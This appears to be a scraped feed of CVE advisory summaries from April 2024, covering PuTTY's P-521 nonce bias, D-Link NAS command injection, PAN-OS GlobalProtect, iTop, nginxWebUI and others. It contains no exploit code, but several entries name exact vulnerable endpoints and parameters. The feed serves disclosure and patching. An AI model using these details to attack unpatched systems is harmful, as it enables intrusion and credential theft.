🚨 CVE-2024-31497In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an attacker to recover a user's NIST P-521 secret key via a quick attack in approximately 60 signatures. This is especially important in a scenario where an adversary is able to read messages signed by PuTTY or Pageant. One scenario is that the adversary is an operator of an SSH server to which the victim authenticates (for remote login or file copy), even though this server is not fully trusted by the victim, and the victim uses the same private key for SSH connections to other services operated by other entities. Here, the rogue server operator (who would otherwise have no way to determine the victim's private key) can derive the victim's private key, and then use it for unauthorized access to those other services. Because SSH is sometimes used to authenticate to Git services, it is possible that this vulnerability could be leveraged for supply-chain attacks on software maintained in Git. It is also conceivable that signed messages from PuTTY or Pageant are readable by adversaries more easily in other scenarios, but none have yet been disclosed.🎖@cveNotify |
|
| 2024-04-15 20:37:35 |
🚨 CVE-2024-3804A vulnerability, which was classified as critical, has been found in Vesystem Cloud Desktop up to 20240408. This issue affects some unknown processing of the file /Public/webuploader/0.1.5/server/fileupload2.php. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-15 20:37:31 |
🚨 CVE-2024-31990Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The API server does not enforce project sourceNamespaces which allows attackers to use the UI to edit resources which should only be mutable via gitops. This vulenrability is fixed in 2.10.7, 2.9.12, and 2.8.16.🎖@cveNotify |
|
| 2024-04-15 20:37:30 |
🚨 CVE-2024-30840A Stack Overflow vulnerability in Tenda AC15 v15.03.05.18 allows attackers to cause a denial of service via the LISTEN parameter in the fromDhcpListClient function.🎖@cveNotify |
|
| 2024-04-15 20:37:26 |
🚨 CVE-2023-45503SQL Injection vulnerability in Macrob7 Macs CMS 1.1.4f, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via crafted payload to resetPassword, forgotPasswordProcess, saveUser, saveRole, deleteUser, deleteRole, deleteComment, deleteUser, allowComment, saveRole, forgotPasswordProcess, resetPassword, saveUser, addComment, saveRole, and saveUser endpoints.🎖@cveNotify |
|
| 2024-04-15 20:37:25 |
🚨 CVE-2024-3273** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-04-15 20:37:24 |
🚨 CVE-2024-3272** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very critical, has been found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. This issue affects some unknown processing of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument user with the input messagebus leads to hard-coded credentials. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259283. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-04-15 19:37:42 |
🚨 CVE-2023-4857An authentication bypass vulnerability was identified in SMM/SMM2 and FPC that could allow an authenticated user to execute certain IPMI calls that could lead to exposure of limited system information.🎖@cveNotify |
|
| 2024-04-15 19:37:41 |
🚨 CVE-2023-48710iTop is an IT service management platform. Files from the `env-production` folder can be retrieved even though they should have restricted access. Hopefully, there is no sensitive files stored in that folder natively, but there could be from a third-party module. The `pages/exec.php` script as been fixed to limit execution of PHP files only. Other file types won't be retrieved and exposed. The vulnerability is fixed in 2.7.10, 3.0.4, 3.1.1, and 3.2.0.🎖@cveNotify |
|
| 2024-04-15 19:37:37 |
🚨 CVE-2023-47626iTop is an IT service management platform. When displaying/editing the user's personal tokens, XSS attacks are possible. This vulnerability is fixed in 3.1.1.🎖@cveNotify |
|
| 2024-04-15 19:37:36 |
🚨 CVE-2023-47123iTop is an IT service management platform. By filling malicious code in an object friendlyname / complementary name, an XSS attack can be performed when this object will displayed as an n:n relation item in another object. This vulnerability is fixed in 3.1.1 and 3.2.0.🎖@cveNotify |
|
| 2024-04-15 19:37:35 |
🚨 CVE-2023-45808iTop is an IT service management platform. When creating or updating an object, extkey values aren't checked to be in the current user silo. In other words, by forging an http request, the user can create objects pointing to out of silo objects (for example a UserRequest in an out of scope Organization). Fixed in iTop 2.7.10, 3.0.4, 3.1.1, and 3.2.0.🎖@cveNotify |
|
| 2024-04-15 19:37:32 |
🚨 CVE-2023-44396iTop is an IT service management platform. Dashlet edits ajax endpoints can be used to produce XSS. Fixed in iTop 2.7.10, 3.0.4, and 3.1.1.🎖@cveNotify |
|
| 2024-04-15 19:37:31 |
🚨 CVE-2023-38511iTop is an IT service management platform. Dashboard editor : can load multiple files and URL, and full path disclosure on dashboard config file. This vulnerability is fixed in 3.0.4 and 3.1.1.🎖@cveNotify |
|
| 2024-04-15 19:37:30 |
🚨 CVE-2024-3786Vulnerability in WBSAirback 21.02.04, which involves improper neutralisation of Server-Side Includes (SSI), through Device Synchronizations (/admin/DeviceReplication). Exploitation of this vulnerability could allow a remote user to execute arbitrary code.🎖@cveNotify |
|
| 2024-04-15 19:37:26 |
🚨 CVE-2024-3784Vulnerability in WBSAirback 21.02.04, which involves improper neutralisation of Server-Side Includes (SSI), through S3 Accounts (/admin/CloudAccounts). Exploitation of this vulnerability could allow a remote user to execute arbitrary code.🎖@cveNotify |
|
| 2024-04-15 19:37:25 |
🚨 CVE-2024-3782Cross-Site Request Forgery vulnerability in WBSAirback 21.02.04, which could allow an attacker to create a manipulated HTML form to perform privileged actions once it is executed by a privileged user.🎖@cveNotify |
|
| 2024-04-15 19:37:24 |
🚨 CVE-2024-3781Command injection vulnerability in the operating system. Improper neutralisation of special elements in Active Directory integration allows the intended command to be modified when sent to a downstream component in WBSAirback 21.02.04.🎖@cveNotify |
|
| 2024-04-15 18:37:43 |
🚨 CVE-2024-23593A vulnerability was reportedin a system recovery bootloader that was part of the Lenovo preloaded Windows 7 and 8 operating systems from 2012 to 2014 that could allow a privileged attacker with local access to modify the boot manager and escalate privileges.🎖@cveNotify |
|
| 2024-04-15 18:37:36 |
🚨 CVE-2023-4857An authentication bypass vulnerability was identified in SMM/SMM2 and FPC that could allow an authenticated user to execute certain IPMI calls that could lead to exposure of limited system information.🎖@cveNotify |
|
| 2024-04-15 18:37:35 |
🚨 CVE-2023-4855A command injection vulnerability was identified in SMM/SMM2 and FPC that could allow an authenticated user with elevated privileges to execute unauthorized commands via IPMI.🎖@cveNotify |
|
| 2024-04-15 18:37:31 |
🚨 CVE-2023-48709iTop is an IT service management platform. When exporting data from backoffice or portal in CSV or Excel files, users' inputs may include malicious formulas that may be imported into Excel. As Excel 2016 does **not** prevent Remote Code Execution by default, uninformed users may become victims. This vulnerability is fixed in 2.7.9, 3.0.4, 3.1.1, and 3.2.0.🎖@cveNotify |
|
| 2024-04-15 18:37:30 |
🚨 CVE-2023-47123iTop is an IT service management platform. By filling malicious code in an object friendlyname / complementary name, an XSS attack can be performed when this object will displayed as an n:n relation item in another object. This vulnerability is fixed in 3.1.1 and 3.2.0.🎖@cveNotify |
|
| 2024-04-15 18:37:26 |
🚨 CVE-2023-44396iTop is an IT service management platform. Dashlet edits ajax endpoints can be used to produce XSS. Fixed in iTop 2.7.10, 3.0.4, and 3.1.1.🎖@cveNotify |
|
| 2024-04-15 18:37:25 |
🚨 CVE-2024-1902lunary-ai/lunary is vulnerable to a session reuse attack, allowing a removed user to change the organization name without proper authorization. The vulnerability stems from the lack of validation to check if a user is still part of an organization before allowing them to make changes. An attacker can exploit this by using an old authorization token to send a PATCH request, modifying the organization's name even after being removed from the organization. This issue is due to incorrect synchronization and affects the orgs.patch route.🎖@cveNotify |
|
| 2024-04-15 18:37:24 |
🚨 CVE-2024-1741lunary-ai/lunary version 1.0.1 is vulnerable to improper authorization, allowing removed members to read, create, modify, and delete prompt templates using an old authorization token. Despite being removed from an organization, these members can still perform operations on prompt templates by sending HTTP requests with their previously captured authorization token. This issue exposes organizations to unauthorized access and manipulation of sensitive template data.🎖@cveNotify |
|
| 2024-04-15 17:37:25 |
🚨 CVE-2023-43790iTop is an IT service management platform. By manipulating HTTP queries, a user can inject malicious content in the fields used for the object friendlyname value. This vulnerability is fixed in 3.1.1 and 3.2.0.🎖@cveNotify |
|
| 2024-04-15 17:37:24 |
🚨 CVE-2023-38511iTop is an IT service management platform. Dashboard editor : can load multiple files and URL, and full path disclosure on dashboard config file. This vulnerability is fixed in 3.0.4 and 3.1.1.🎖@cveNotify |
|
| 2024-04-15 14:37:48 |
🚨 CVE-2024-3786Vulnerability in WBSAirback 21.02.04, which involves improper neutralisation of Server-Side Includes (SSI), through Device Synchronizations (/admin/DeviceReplication). Exploitation of this vulnerability could allow a remote user to execute arbitrary code.🎖@cveNotify |
|
| 2024-04-15 14:37:47 |
🚨 CVE-2024-3784Vulnerability in WBSAirback 21.02.04, which involves improper neutralisation of Server-Side Includes (SSI), through S3 Accounts (/admin/CloudAccounts). Exploitation of this vulnerability could allow a remote user to execute arbitrary code.🎖@cveNotify |
|
| 2024-04-15 14:37:46 |
🚨 CVE-2024-3782Cross-Site Request Forgery vulnerability in WBSAirback 21.02.04, which could allow an attacker to create a manipulated HTML form to perform privileged actions once it is executed by a privileged user.🎖@cveNotify |
|
| 2024-04-15 14:37:42 |
🚨 CVE-2024-31081A heap-based buffer over-read vulnerability was found in the X.org server's ProcXIPassiveGrabDevice() function. This issue occurs when byte-swapped length values are used in replies, potentially leading to memory leakage and segmentation faults, particularly when triggered by a client with a different endianness. This vulnerability could be exploited by an attacker to cause the X server to read heap memory values and then transmit them back to the client until encountering an unmapped page, resulting in a crash. Despite the attacker's inability to control the specific memory copied into the replies, the small length values typically stored in a 32-bit integer can result in significant attempted out-of-bounds reads.🎖@cveNotify |
|
| 2024-04-15 14:37:41 |
🚨 CVE-2023-6536A flaw was found in the Linux kernel's NVMe driver. This issue may allow an unauthenticated malicious actor to send a set of crafted TCP packages when using NVMe over TCP, leading the NVMe driver to a NULL pointer dereference in the NVMe driver, causing kernel panic and a denial of service.🎖@cveNotify |
|
| 2024-04-15 13:37:53 |
🚨 CVE-2024-31263Cross-Site Request Forgery (CSRF) vulnerability in aerin Loan Repayment Calculator and Application Form.This issue affects Loan Repayment Calculator and Application Form: from n/a through 2.9.4.🎖@cveNotify |
|
| 2024-04-15 13:37:52 |
🚨 CVE-2024-31262Cross-Site Request Forgery (CSRF) vulnerability in Jcodex WooCommerce Checkout Field Editor (Checkout Manager).This issue affects WooCommerce Checkout Field Editor (Checkout Manager): from n/a through 2.1.8.🎖@cveNotify |
|
| 2024-04-15 13:37:49 |
🚨 CVE-2024-31251Cross-Site Request Forgery (CSRF) vulnerability in PeepSo Community by PeepSo.This issue affects Community by PeepSo: from n/a through 6.3.1.1.🎖@cveNotify |
|
| 2024-04-15 13:37:48 |
🚨 CVE-2024-31238Cross-Site Request Forgery (CSRF) vulnerability in Zaytech Smart Online Order for Clover.This issue affects Smart Online Order for Clover: from n/a through 1.5.5.🎖@cveNotify |
|
| 2024-04-15 13:37:47 |
🚨 CVE-2024-31235Cross-Site Request Forgery (CSRF) vulnerability in WebToffee WordPress Comments Import & Export.This issue affects WordPress Comments Import & Export: from n/a through 2.3.5.🎖@cveNotify |
|
| 2024-04-15 13:37:44 |
🚨 CVE-2024-28718An issue in OpenStack magnum yoga-eom version allows a remote attacker to execute arbitrary code via the cert_manager.py. component.🎖@cveNotify |
|
| 2024-04-15 13:37:43 |
🚨 CVE-2024-25545An issue in Weave Weave Desktop v.7.78.10 allows a local attacker to execute arbitrary code via a crafted script to the nwjs framework component.🎖@cveNotify |
|
| 2024-04-15 13:37:42 |
🚨 CVE-2022-40211Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GiveWP allows Stored XSS.This issue affects GiveWP: from n/a through 2.25.1.🎖@cveNotify |
|
| 2024-04-15 12:37:51 |
🚨 CVE-2024-3780A vulnerability of Information Exposure has been found on Technicolor CGA2121 affecting the version 1.01, this vulnerability allows a local attacker to obtain sensitive information stored on the device such as wifi network's SSID and their respective passwords.🎖@cveNotify |
|
| 2024-04-15 12:37:50 |
🚨 CVE-2024-24891Exposure of Sensitive Information to an Unauthorized Actor vulnerability in openEuler kernel on Linux allows Resource Leak Exposure. This vulnerability is associated with program files https://gitee.Com/openeuler/kernel/blob/openEuler-1.0-LTS/drivers/staging/gmjstcm/tcm.C.This issue affects kernel: from 4.19.90-2109.1.0.0108 before 4.19.90-2403.4.0.0244.🎖@cveNotify |
|
| 2024-04-15 11:37:42 |
🚨 CVE-2024-31383Cross-Site Request Forgery (CSRF) vulnerability in Pagelayer PopularFX.This issue affects PopularFX: from n/a through 1.2.4.🎖@cveNotify |
|
| 2024-04-15 11:37:41 |
🚨 CVE-2024-31379Cross-Site Request Forgery (CSRF) vulnerability in Smash Balloon Smash Balloon Social Post Feed.This issue affects Smash Balloon Social Post Feed: from n/a through 4.2.1.🎖@cveNotify |
|
| 2024-04-15 11:37:40 |
🚨 CVE-2024-31378Cross-Site Request Forgery (CSRF) vulnerability in MailMunch MailChimp Forms by MailMunch.This issue affects MailChimp Forms by MailMunch: from n/a through 3.2.1.🎖@cveNotify |
|
| 2024-04-15 11:37:36 |
🚨 CVE-2024-31373Cross-Site Request Forgery (CSRF) vulnerability in E2Pdf.This issue affects e2pdf: from n/a through 1.20.27.🎖@cveNotify |
|
| 2024-04-15 11:37:35 |
🚨 CVE-2024-30220Command injection vulnerability in MZK-MF300N all firmware versions allows a network-adjacent unauthenticated attacker to execute an arbitrary command by sending a specially crafted request to a certain port.🎖@cveNotify |
|
| 2024-04-15 11:37:31 |
🚨 CVE-2024-29219Out-of-bounds read vulnerability exists in KV STUDIO Ver.11.64 and earlier and KV REPLAY VIEWER Ver.2.64 and earlier, which may lead to information disclosure or arbitrary code execution by having a user of the affected product open a specially crafted file.🎖@cveNotify |
|
| 2024-04-15 11:37:30 |
🚨 CVE-2024-28957Generation of predictable identifiers issue exists in Cente middleware TCP/IP Network Series. If this vulnerability is exploited, a remote unauthenticated attacker may interfere communications by predicting some packet header IDs of the device.🎖@cveNotify |
|
| 2024-04-15 11:37:29 |
🚨 CVE-2024-28894Out-of-bounds read vulnerability caused by improper checking of the option length values in IPv6 headers exists in Cente middleware TCP/IP Network Series, which may allow an unauthenticated attacker to stop the device operations by sending a specially crafted packet.🎖@cveNotify |
|
| 2024-04-15 11:37:26 |
🚨 CVE-2024-28099VT STUDIO Ver.8.32 and earlier contains an issue with the DLL search path, which may lead to insecurely loading Dynamic Link Libraries. As a result, arbitrary code may be executed with the privileges of the running application.🎖@cveNotify |
|
| 2024-04-15 11:37:25 |
🚨 CVE-2024-23486Plaintext storage of a password issue exists in BUFFALO wireless LAN routers, which may allow a network-adjacent unauthenticated attacker with access to the product's login page may obtain configured credentials.🎖@cveNotify |
|
| 2024-04-15 11:37:24 |
🚨 CVE-2024-26817In the Linux kernel, the following vulnerability has been resolved:amdkfd: use calloc instead of kzalloc to avoid integer overflowThis uses calloc instead of doing the multiplication which mightoverflow.🎖@cveNotify |
|
| 2024-04-15 10:37:47 |
🚨 CVE-2024-31933Cross-Site Request Forgery (CSRF) vulnerability in Live Composer Team Page Builder: Live Composer.This issue affects Page Builder: Live Composer: from n/a through 1.5.35.🎖@cveNotify |
|
| 2024-04-15 10:37:46 |
🚨 CVE-2024-31922Cross-Site Request Forgery (CSRF) vulnerability in Anton Aleksandrov WordPress Hosting Benchmark tool.This issue affects WordPress Hosting Benchmark tool: from n/a through 1.3.6.🎖@cveNotify |
|
| 2024-04-15 10:37:45 |
🚨 CVE-2024-31921Cross-Site Request Forgery (CSRF) vulnerability in Etoile Web Design Ultimate Product Catalogue.This issue affects Ultimate Product Catalogue: from n/a through 5.2.15.🎖@cveNotify |
|
| 2024-04-15 10:37:42 |
🚨 CVE-2024-31920Cross-Site Request Forgery (CSRF) vulnerability in Tyche Softwares Currency per Product for WooCommerce.This issue affects Currency per Product for WooCommerce: from n/a through 1.6.0.🎖@cveNotify |
|
| 2024-04-15 10:37:41 |
🚨 CVE-2024-31432Missing Authorization vulnerability in StellarWP Restrict Content.This issue affects Restrict Content: from n/a through 3.2.8.🎖@cveNotify |
|
| 2024-04-15 10:37:40 |
🚨 CVE-2024-31431Cross-Site Request Forgery (CSRF) vulnerability in Tyche Softwares Product Input Fields for WooCommerce.This issue affects Product Input Fields for WooCommerce: from n/a through 1.7.0.🎖@cveNotify |
|
| 2024-04-15 10:37:36 |
🚨 CVE-2024-31427Cross-Site Request Forgery (CSRF) vulnerability in Marker.Io Marker.Io.This issue affects Marker.Io : from n/a through 1.1.8.🎖@cveNotify |
|
| 2024-04-15 10:37:35 |
🚨 CVE-2024-31425Cross-Site Request Forgery (CSRF) vulnerability in TMS Amelia.This issue affects Amelia: from n/a through 1.0.95.🎖@cveNotify |
|
| 2024-04-15 10:37:31 |
🚨 CVE-2024-22439A potential security vulnerability has been identified in HPE FlexFabric and FlexNetwork series products. This vulnerability could be exploited to gain privileged access to switches resulting in information disclosure.🎖@cveNotify |
|
| 2024-04-15 10:37:30 |
🚨 CVE-2024-22437A potential security vulnerability has been identified in VSS Provider and CAPI Proxy software for certain HPE MSA storage products. This vulnerability could be exploited to gain elevated privilege on the system.🎖@cveNotify |
|
| 2024-04-14 13:37:25 |
🚨 CVE-2024-24863In malidp_mw_connector_reset, new memory is allocated with kzalloc, but no check is performed. In order to prevent null pointer dereferencing, ensure that mw_state is checked before calling __drm_atomic_helper_connector_reset.🎖@cveNotify |
|
| 2024-04-14 13:37:24 |
🚨 CVE-2024-24862In function pci1xxxx_spi_probe, there is a potential null pointer thatmay be caused by a failed memory allocation by the function devm_kzalloc.Hence, a null pointer check needs to be added to prevent null pointerdereferencing later in the code.To fix this issue, spi_bus->spi_int[iter] should be checked. The memoryallocated by devm_kzalloc will be automatically released, so just directlyreturn -ENOMEM without worrying about memory leaks.🎖@cveNotify |
|
| 2024-04-14 04:37:26 |
🚨 CVE-2024-3516Heap buffer overflow in ANGLE in Google Chrome prior to 123.0.6312.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-04-14 04:37:25 |
🚨 CVE-2024-26811In the Linux kernel, the following vulnerability has been resolved:ksmbd: validate payload size in ipc responseIf installing malicious ksmbd-tools, ksmbd.mountd can return invalid ipcresponse to ksmbd kernel server. ksmbd should validate payload size ofipc response from ksmbd.mountd to avoid memory overrun orslab-out-of-bounds. This patch validate 3 ipc response that has payload.🎖@cveNotify |
|
| 2024-04-14 04:37:24 |
🚨 CVE-2024-3378A vulnerability has been found in iboss Secure Web Gateway up to 10.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /login of the component Login Portal. The manipulation of the argument redirectUrl leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 10.2.0.160 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-259501 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-13 21:37:24 |
🚨 CVE-2024-3740A vulnerability, which was classified as critical, has been found in cym1102 nginxWebUI up to 3.9.9. This issue affects the function exec of the file /adminPage/conf/reload. The manipulation of the argument nginxExe leads to deserialization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-260579.🎖@cveNotify |
|
| 2024-04-13 19:37:24 |
🚨 CVE-2024-3739A vulnerability classified as critical was found in cym1102 nginxWebUI up to 3.9.9. This vulnerability affects unknown code of the file /adminPage/main/upload. The manipulation of the argument file leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-260578 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-13 18:37:24 |
🚨 CVE-2024-3738A vulnerability classified as critical has been found in cym1102 nginxWebUI up to 3.9.9. This affects the function handlePath of the file /adminPage/conf/saveCmd. The manipulation of the argument nginxPath leads to improper certificate validation. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260577 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-13 17:37:25 |
🚨 CVE-2024-3737A vulnerability was found in cym1102 nginxWebUI up to 3.9.9. It has been rated as critical. Affected by this issue is the function findCountByQuery of the file /adminPage/www/addOver. The manipulation of the argument dir leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-260576.🎖@cveNotify |
|
| 2024-04-13 15:37:24 |
🚨 CVE-2024-32487less through 653 allows OS command execution via a newline character in the name of a file, because quoting is mishandled in filename.c. Exploitation typically requires use with attacker-controlled file names, such as the files extracted from an untrusted archive. Exploitation also requires the LESSOPEN environment variable, but this is set by default in many common cases.🎖@cveNotify |
|
| 2024-04-13 14:37:24 |
🚨 CVE-2024-3736A vulnerability was found in cym1102 nginxWebUI up to 3.9.9. It has been declared as problematic. Affected by this vulnerability is the function upload of the file /adminPage/main/upload. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-260575.🎖@cveNotify |
|
| 2024-04-13 13:37:24 |
🚨 CVE-2024-3735A vulnerability was found in Smart Office up to 20240405. It has been classified as problematic. Affected is an unknown function of the file Main.aspx. The manipulation of the argument New Password/Confirm Password with the input 1 leads to weak password requirements. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-260574 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-13 12:37:31 |
🚨 CVE-2024-26654In the Linux kernel, the following vulnerability has been resolved:ALSA: sh: aica: reorder cleanup operations to avoid UAF bugsThe dreamcastcard->timer could schedule the spu_dma_work and thespu_dma_work could also arm the dreamcastcard->timer.When the snd_pcm_substream is closing, the aica_channel will bedeallocated. But it could still be dereferenced in the workerthread. The reason is that del_timer() will return directlyregardless of whether the timer handler is running or not andthe worker could be rescheduled in the timer handler. As a result,the UAF bug will happen. The racy situation is shown below: (Thread 1) | (Thread 2)snd_aicapcm_pcm_close() | ... | run_spu_dma() //worker | mod_timer() flush_work() | del_timer() | aica_period_elapsed() //timer kfree(dreamcastcard->channel) | schedule_work() | run_spu_dma() //worker ... | dreamcastcard->channel-> //USEIn order to mitigate this bug and other possible corner cases,call mod_timer() conditionally in run_spu_dma(), then implementPCM sync_stop op to cancel both the timer and worker. The sync_stopop will be called from PCM core appropriately when needed.🎖@cveNotify |
|
| 2024-04-13 12:37:30 |
🚨 CVE-2024-26642In the Linux kernel, the following vulnerability has been resolved:netfilter: nf_tables: disallow anonymous set with timeout flagAnonymous sets are never used with timeout from userspace, reject this.Exception to this rule is NFT_SET_EVAL to ensure legacy meters still work.🎖@cveNotify |
|
| 2024-04-13 12:37:26 |
🚨 CVE-2023-52488In the Linux kernel, the following vulnerability has been resolved:serial: sc16is7xx: convert from _raw_ to _noinc_ regmap functions for FIFOThe SC16IS7XX IC supports a burst mode to access the FIFOs where theinitial register address is sent ($00), followed by all the FIFO datawithout having to resend the register address each time. In this mode, theIC doesn't increment the register address for each R/W byte.The regmap_raw_read() and regmap_raw_write() are functions which canperform IO over multiple registers. They are currently used to read/writefrom/to the FIFO, and although they operate correctly in this burst mode onthe SPI bus, they would corrupt the regmap cache if it was not disabledmanually. The reason is that when the R/W size is more than 1 byte, thesefunctions assume that the register address is incremented and handle thecache accordingly.Convert FIFO R/W functions to use the regmap _noinc_ versions in order toremove the manual cache control which was a workaround when using the_raw_ versions. FIFO registers are properly declared as volatile socache will not be used/updated for FIFO accesses.🎖@cveNotify |
|
| 2024-04-13 12:37:25 |
🚨 CVE-2023-52482In the Linux kernel, the following vulnerability has been resolved:x86/srso: Add SRSO mitigation for Hygon processorsAdd mitigation for the speculative return stack overflow vulnerabilitywhich exists on Hygon processors too.🎖@cveNotify |
|
| 2024-04-13 12:37:24 |
🚨 CVE-2023-52458In the Linux kernel, the following vulnerability has been resolved:block: add check that partition length needs to be aligned with block sizeBefore calling add partition or resize partition, there is no checkon whether the length is aligned with the logical block size.If the logical block size of the disk is larger than 512 bytes,then the partition size maybe not the multiple of the logical block size,and when the last sector is read, bio_truncate() will adjust the bio size,resulting in an IO error if the size of the read command is smaller thanthe logical block size.If integrity data is supported, this will alsoresult in a null pointer dereference when calling bio_integrity_free.🎖@cveNotify |
|
| 2024-04-13 11:37:24 |
🚨 CVE-2024-3719A vulnerability, which was classified as critical, was found in Campcodes House Rental Management System 1.0. This affects an unknown part of the file ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-260571.🎖@cveNotify |
|
| 2024-04-13 09:37:24 |
🚨 CVE-2023-6494The WPC Smart Quick View for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-04-13 05:37:24 |
🚨 CVE-2024-2583The WP Shortcodes Plugin — Shortcodes Ultimate WordPress plugin before 7.0.5 does not properly escape some of its shortcodes attributes before they are echoed back to users, making it possible for users with the contributor role to conduct Stored XSS attacks.🎖@cveNotify |
|
| 2024-04-13 04:37:25 |
🚨 CVE-2024-27351In Django 3.2 before 3.2.25, 4.2 before 4.2.11, and 5.0 before 5.0.3, the django.utils.text.Truncator.words() method (with html=True) and the truncatewords_html template filter are subject to a potential regular expression denial-of-service attack via a crafted string. NOTE: this issue exists because of an incomplete fix for CVE-2019-14232 and CVE-2023-43665.🎖@cveNotify |
|
| 2024-04-13 04:37:24 |
🚨 CVE-2024-24680An issue was discovered in Django 3.2 before 3.2.24, 4.2 before 4.2.10, and Django 5.0 before 5.0.2. The intcomma template filter was subject to a potential denial-of-service attack when used with very long strings.🎖@cveNotify |
|
| 2024-04-13 02:37:25 |
🚨 CVE-2024-1957The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'give_form' shortcode in all versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-04-13 02:37:24 |
🚨 CVE-2024-26811In the Linux kernel, the following vulnerability has been resolved:ksmbd: validate payload size in ipc responseIf installing malicious ksmbd-tools, ksmbd.mountd can return invalid ipcresponse to ksmbd kernel server. ksmbd should validate payload size ofipc response from ksmbd.mountd to avoid memory overrun orslab-out-of-bounds. This patch validate 3 ipc response that has payload.🎖@cveNotify |
|
| 2024-04-13 01:07:24 |
🚨 CVE-2024-3400A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 are in development and are expected to be released by April 14, 2024. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.🎖@cveNotify |
|
| 2024-04-12 23:37:24 |
🚨 CVE-2024-32028OpenTelemetry dotnet is a dotnet telemetry framework. In affected versions of `OpenTelemetry.Instrumentation.Http` and `OpenTelemetry.Instrumentation.AspNetCore` the `url.full` writes attribute/tag on spans (`Activity`) when tracing is enabled for outgoing http requests and `OpenTelemetry.Instrumentation.AspNetCore` writes the `url.query` attribute/tag on spans (`Activity`) when tracing is enabled for incoming http requests. These attributes are defined by the Semantic Conventions for HTTP Spans. Up until version `1.8.1` the values written by `OpenTelemetry.Instrumentation.Http` & `OpenTelemetry.Instrumentation.AspNetCore` will pass-through the raw query string as was sent or received (respectively). This may lead to sensitive information (e.g. EUII - End User Identifiable Information, credentials, etc.) being leaked into telemetry backends (depending on the application(s) being instrumented) which could cause privacy and/or security incidents. Note: Older versions of `OpenTelemetry.Instrumentation.Http` & `OpenTelemetry.Instrumentation.AspNetCore` may use different tag names but have the same vulnerability. The `1.8.1` versions of `OpenTelemetry.Instrumentation.Http` & `OpenTelemetry.Instrumentation.AspNetCore` will now redact by default all values detected on transmitted or received query strings. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-04-12 22:37:26 |
🚨 CVE-2024-31462stable-diffusion-webui is a web interface for Stable Diffusion, implemented using Gradio library. Stable-diffusion-webui 1.7.0 is vulnerable to a limited file write affecting Windows systems. The create_ui method (Backup/Restore tab) in modules/ui_extensions.py takes user input into the config_save_name variable on line 653. This user input is later used in the save_config_state method and used to create a file path on line 65, which is afterwards opened for writing on line 67, which leads to a limited file write exploitable on Windows systems. This issue may lead to limited file write. It allows for writing json files anywhere on the server where the web server has access.🎖@cveNotify |
|
| 2024-04-12 22:37:25 |
